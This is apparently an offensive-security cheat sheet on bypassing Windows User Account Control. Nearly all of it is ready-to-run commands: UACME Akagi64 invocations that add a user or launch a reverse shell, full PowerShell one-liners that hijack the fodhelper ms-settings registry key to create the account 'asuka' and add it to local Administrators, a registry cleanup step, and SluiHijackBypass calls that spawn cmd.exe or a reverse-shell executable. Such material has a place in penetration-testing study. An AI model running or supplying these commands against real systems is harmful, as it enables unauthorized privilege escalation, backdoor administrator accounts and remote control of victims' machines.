UAC Bypass

Common UAC Bypass Checklists

A UAC bypass is a method to circumvent User Account Control, a security feature in Windows that asks for confirmation before making major changes. Bypasses typically trick trusted programs into running malicious code with high privileges.

UACME

# Add new user
Akagi64.exe 61 "net user asuka asuk@1337 /add"

# Reverse shell
Akagi64.exe 61 "E:\Exploits\shell.exe"

Foodhelper

powershell

# Add user "asuka"
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force; New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force; Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "net user asuka asuk@1337 /add" -Force; Start-Process "C:\Windows\System32\fodhelper.exe"

# Add asuka to Local Administrator
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force; New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force; Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "net localgroup Administrators asuka /add" -Force; Start-Process "C:\Windows\System32\fodhelper.exe"

# Delete registry value
reg delete HKCU\Software\Classes\ms-settings\ /f

Slui File Handler Hijack LPE

powershell -ep bypass
. .\SluiHijackBypass.ps1

SluiHijackBypass -command "cmd.exe" -arch 64
# or
SluiHijackBypass "C:\xampp\htdocs\reverse-shell.exe"

Last updated